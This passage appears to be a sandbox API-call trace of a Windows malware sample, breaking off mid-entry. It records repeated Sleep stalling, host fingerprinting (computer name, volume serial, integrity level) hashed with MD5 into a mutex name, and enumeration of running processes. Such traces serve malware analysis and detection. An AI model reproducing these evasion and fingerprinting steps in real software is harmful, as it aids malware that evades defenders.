Sleep (dwMilliseconds=0xa) [0243.961] Sleep (dwMilliseconds=0xa) [0243.977] Sleep (dwMilliseconds=0xa) [0243.993] Sleep (dwMilliseconds=0xa) [0244.008] Sleep (dwMilliseconds=0xa) [0244.024] Sleep (dwMilliseconds=0xa) [0244.047] Sleep (dwMilliseconds=0xa) [0244.055] Sleep (dwMilliseconds=0xa) [0244.113] Sleep (dwMilliseconds=0xa) [0244.117] Sleep (dwMilliseconds=0xa) [0244.135] Sleep (dwMilliseconds=0xa) [0244.169] Sleep (dwMilliseconds=0xa) [0244.193] Sleep (dwMilliseconds=0xa) [0244.217] Sleep (dwMilliseconds=0xa) [0244.227] Sleep (dwMilliseconds=0xa) [0244.242] Sleep (dwMilliseconds=0xa) [0244.258] Sleep (dwMilliseconds=0xa) [0244.273] Sleep (dwMilliseconds=0xa) [0244.289] Sleep (dwMilliseconds=0xa) [0244.322] Sleep (dwMilliseconds=0xa) [0244.345] Sleep (dwMilliseconds=0xa) [0244.351] Sleep (dwMilliseconds=0xa) [0244.367] Sleep (dwMilliseconds=0xa) [0244.382] Sleep (dwMilliseconds=0xa) [0244.399] Sleep (dwMilliseconds=0xa) [0244.435] Sleep (dwMilliseconds=0xa) [0244.459] Sleep (dwMilliseconds=0xa) [0244.483] Sleep (dwMilliseconds=0xa) [0244.492] Sleep (dwMilliseconds=0xa) [0244.507] Sleep (dwMilliseconds=0xa) [0244.525] Sleep (dwMilliseconds=0xa) [0244.539] Sleep (dwMilliseconds=0xa) [0244.554] Sleep (dwMilliseconds=0xa) [0244.578] Sleep (dwMilliseconds=0xa) [0244.585] Sleep (dwMilliseconds=0xa) [0244.609] Sleep (dwMilliseconds=0xa) [0244.617] Sleep (dwMilliseconds=0xa) [0244.632] Sleep (dwMilliseconds=0xa) [0244.648] Sleep (dwMilliseconds=0xa) [0244.663] Sleep (dwMilliseconds=0xa) [0244.679] Sleep (dwMilliseconds=0xa) [0244.703] Sleep (dwMilliseconds=0xa) [0244.710] Sleep (dwMilliseconds=0xa) [0244.734] Sleep (dwMilliseconds=0xa) [0244.741] Sleep (dwMilliseconds=0xa) [0244.757] Sleep (dwMilliseconds=0xa) [0244.783] Sleep (dwMilliseconds=0xa) [0244.788] Sleep (dwMilliseconds=0xa) [0244.804] Sleep (dwMilliseconds=0xa) [0244.828] Sleep (dwMilliseconds=0xa) [0244.835] Sleep (dwMilliseconds=0xa) [0244.859] Sleep (dwMilliseconds=0xa) [0244.866] Sleep (dwMilliseconds=0xa) [0244.882] Sleep (dwMilliseconds=0xa) [0244.897] Sleep (dwMilliseconds=0xa) [0244.932] Sleep (dwMilliseconds=0xa) [0244.956] Sleep (dwMilliseconds=0xa) [0244.960] Sleep (dwMilliseconds=0xa) [0244.983] Sleep (dwMilliseconds=0xa) [0244.991] Sleep (dwMilliseconds=0xa) [0245.007] Sleep (dwMilliseconds=0xa) [0245.022] Sleep (dwMilliseconds=0xa) [0245.038] Sleep (dwMilliseconds=0xa) [0245.053] Sleep (dwMilliseconds=0xa) [0245.078] Sleep (dwMilliseconds=0xa) [0245.085] Sleep (dwMilliseconds=0xa) [0245.108] Sleep (dwMilliseconds=0xa) [0245.116] Sleep (dwMilliseconds=0xa) [0245.150] Sleep (dwMilliseconds=0xa) [0245.163] Sleep (dwMilliseconds=0xa) [0245.178] Sleep (dwMilliseconds=0xa) [0245.236] Sleep (dwMilliseconds=0xa) [0245.261] Sleep (dwMilliseconds=0xa) [0245.272] Sleep (dwMilliseconds=0xa) [0245.288] Sleep (dwMilliseconds=0xa) [0245.326] Sleep (dwMilliseconds=0xa) [0245.355] Sleep (dwMilliseconds=0xa) [0245.365] Sleep (dwMilliseconds=0xa) [0245.391] Sleep (dwMilliseconds=0xa) [0245.397] Sleep (dwMilliseconds=0xa) [0245.412] Sleep (dwMilliseconds=0xa) [0245.428] Sleep (dwMilliseconds=0xa) [0245.443] Sleep (dwMilliseconds=0xa) [0245.479] Sleep (dwMilliseconds=0xa) [0245.503] Sleep (dwMilliseconds=0xa) [0245.527] Sleep (dwMilliseconds=0xa) [0245.537] Sleep (dwMilliseconds=0xa) [0245.552] Sleep (dwMilliseconds=0xa) [0245.568] Sleep (dwMilliseconds=0xa) [0245.584] Sleep (dwMilliseconds=0xa) [0245.599] Sleep (dwMilliseconds=0xa) [0245.623] Sleep (dwMilliseconds=0xa) [0245.631] Sleep (dwMilliseconds=0xa) [0245.655] Sleep (dwMilliseconds=0xa) [0245.662] Sleep (dwMilliseconds=0xa) [0245.677] Sleep (dwMilliseconds=0xa) [0245.693] Sleep (dwMilliseconds=0xa) [0245.709] Sleep (dwMilliseconds=0xa) [0245.724] Sleep (dwMilliseconds=0xa) [0245.748] Sleep (dwMilliseconds=0xa) [0245.756] Sleep (dwMilliseconds=0xa) [0245.780] Sleep (dwMilliseconds=0xa) [0245.790] Sleep (dwMilliseconds=0xa) [0245.802] Sleep (dwMilliseconds=0xa) [0245.818] Sleep (dwMilliseconds=0xa) [0245.834] Sleep (dwMilliseconds=0xa) [0245.849] Sleep (dwMilliseconds=0xa) [0245.873] Sleep (dwMilliseconds=0xa) [0245.880] GetSystemDirectoryA (in: lpBuffer=0x4b4fb70, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0245.880] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" [0245.880] RtlGetVersion (in: lpVersionInformation=0x2b80447 | out: lpVersionInformation=0x2b80447*(dwOSVersionInfoSize=0x0, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0245.880] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x4b4fb58 | out: TokenHandle=0x4b4fb58*=0x520) returned 1 [0245.881] GetTokenInformation (in: TokenHandle=0x520, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4b4fb50 | out: TokenInformation=0x0, ReturnLength=0x4b4fb50) returned 0 [0245.881] GetProcessHeap () returned 0x210000 [0245.881] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x25) returned 0x2bbde20 [0245.881] GetTokenInformation (in: TokenHandle=0x520, TokenInformationClass=0x19, TokenInformation=0x2bbde20, TokenInformationLength=0x1c, ReturnLength=0x4b4fb50 | out: TokenInformation=0x2bbde20, ReturnLength=0x4b4fb50) returned 1 [0245.881] GetSidSubAuthorityCount (pSid=0x2bbde30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2bbde31 [0245.881] GetSidSubAuthority (pSid=0x2bbde30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2bbde38 [0245.881] GetProcessHeap () returned 0x210000 [0245.881] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2bbde20) returned 1 [0245.881] CloseHandle (hObject=0x520) returned 1 [0245.881] GetComputerNameA (in: lpBuffer=0x4b4fc20, nSize=0x4b4fc50 | out: lpBuffer="XDUWTFONO", nSize=0x4b4fc50) returned 1 [0245.881] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x4b4fc60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x4b4fc60*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0245.884] GetProcessHeap () returned 0x210000 [0245.884] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x29) returned 0x4780ce0 [0245.884] wsprintfA (in: param_1=0x4780ce0, param_2="%s%08X%08X" | out: param_1="XDUWTFONO0B0D4D069C354B42") returned 25 [0245.884] CryptAcquireContextA (in: phProv=0x4b4fb98, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x4b4fb98*=0x473a6d0) returned 1 [0245.887] CryptCreateHash (in: hProv=0x473a6d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x4b4fb90 | out: phHash=0x4b4fb90) returned 1 [0245.887] lstrlenA (lpString="XDUWTFONO0B0D4D069C354B42") returned 25 [0245.887] CryptHashData (hHash=0x4786a10, pbData=0x4780ce0, dwDataLen=0x19, dwFlags=0x0) returned 1 [0245.887] CryptGetHashParam (in: hHash=0x4786a10, dwParam=0x2, pbData=0x4b4fba0, pdwDataLen=0x4b4fbd0, dwFlags=0x0 | out: pbData=0x4b4fba0, pdwDataLen=0x4b4fbd0) returned 1 [0245.887] wsprintfA (in: param_1=0x2b8020c, param_2="%02X" | out: param_1="60") returned 2 [0245.887] wsprintfA (in: param_1=0x2b8020e, param_2="%02X" | out: param_1="49") returned 2 [0245.887] wsprintfA (in: param_1=0x2b80210, param_2="%02X" | out: param_1="54") returned 2 [0245.887] wsprintfA (in: param_1=0x2b80212, param_2="%02X" | out: param_1="A4") returned 2 [0245.887] wsprintfA (in: param_1=0x2b80214, param_2="%02X" | out: param_1="50") returned 2 [0245.887] wsprintfA (in: param_1=0x2b80216, param_2="%02X" | out: param_1="75") returned 2 [0245.887] wsprintfA (in: param_1=0x2b80218, param_2="%02X" | out: param_1="2B") returned 2 [0245.887] wsprintfA (in: param_1=0x2b8021a, param_2="%02X" | out: param_1="96") returned 2 [0245.887] wsprintfA (in: param_1=0x2b8021c, param_2="%02X" | out: param_1="B7") returned 2 [0245.887] wsprintfA (in: param_1=0x2b8021e, param_2="%02X" | out: param_1="2C") returned 2 [0245.887] wsprintfA (in: param_1=0x2b80220, param_2="%02X" | out: param_1="F2") returned 2 [0245.887] wsprintfA (in: param_1=0x2b80222, param_2="%02X" | out: param_1="C4") returned 2 [0245.887] wsprintfA (in: param_1=0x2b80224, param_2="%02X" | out: param_1="FA") returned 2 [0245.888] wsprintfA (in: param_1=0x2b80226, param_2="%02X" | out: param_1="84") returned 2 [0245.888] wsprintfA (in: param_1=0x2b80228, param_2="%02X" | out: param_1="48") returned 2 [0245.888] wsprintfA (in: param_1=0x2b8022a, param_2="%02X" | out: param_1="6C") returned 2 [0245.888] CryptDestroyHash (hHash=0x4786a10) returned 1 [0245.888] CryptReleaseContext (hProv=0x473a6d0, dwFlags=0x0) returned 1 [0245.888] wsprintfA (in: param_1=0x2b8022c, param_2="%08X" | out: param_1="9C354B42") returned 8 [0245.888] GetProcessHeap () returned 0x210000 [0245.888] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x4780ce0) returned 1 [0245.888] wsprintfA (in: param_1=0x2b80dae, param_2="%s%s" | out: param_1="604954A450752B96B72CF2C4FA84486C9C354B42FF") returned 42 [0245.888] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="604954A450752B96B72CF2C4FA84486C9C354B42") returned 0x520 [0245.888] RtlGetLastWin32Error () returned 0xb7 [0245.888] CloseHandle (hObject=0x520) returned 1 [0245.888] RtlExitUserThread (Status=0x0) Thread: id = 313 os_tid = 0x6e0 [0228.682] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x520 [0228.684] Process32First (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.685] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0228.685] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0228.686] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.686] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0228.687] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.687] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0228.688] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0228.688] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0228.689] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0228.693] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.694] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.694] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.695] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.695] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.696] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0228.696] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.696] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.697] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0228.697] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0228.698] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.698] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.699] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.699] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0228.700] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0228.700] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0228.701] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0228.701] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0228.702] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0228.702] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0228.703] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0228.703] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0228.703] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0228.704] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0228.705] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0228.705] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0228.706] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0228.706] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0228.706] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0228.707] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0228.707] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0228.708] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0228.708] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0228.709] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0228.709] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.710] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.710] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0228.711] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.711] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.712] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.712] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, 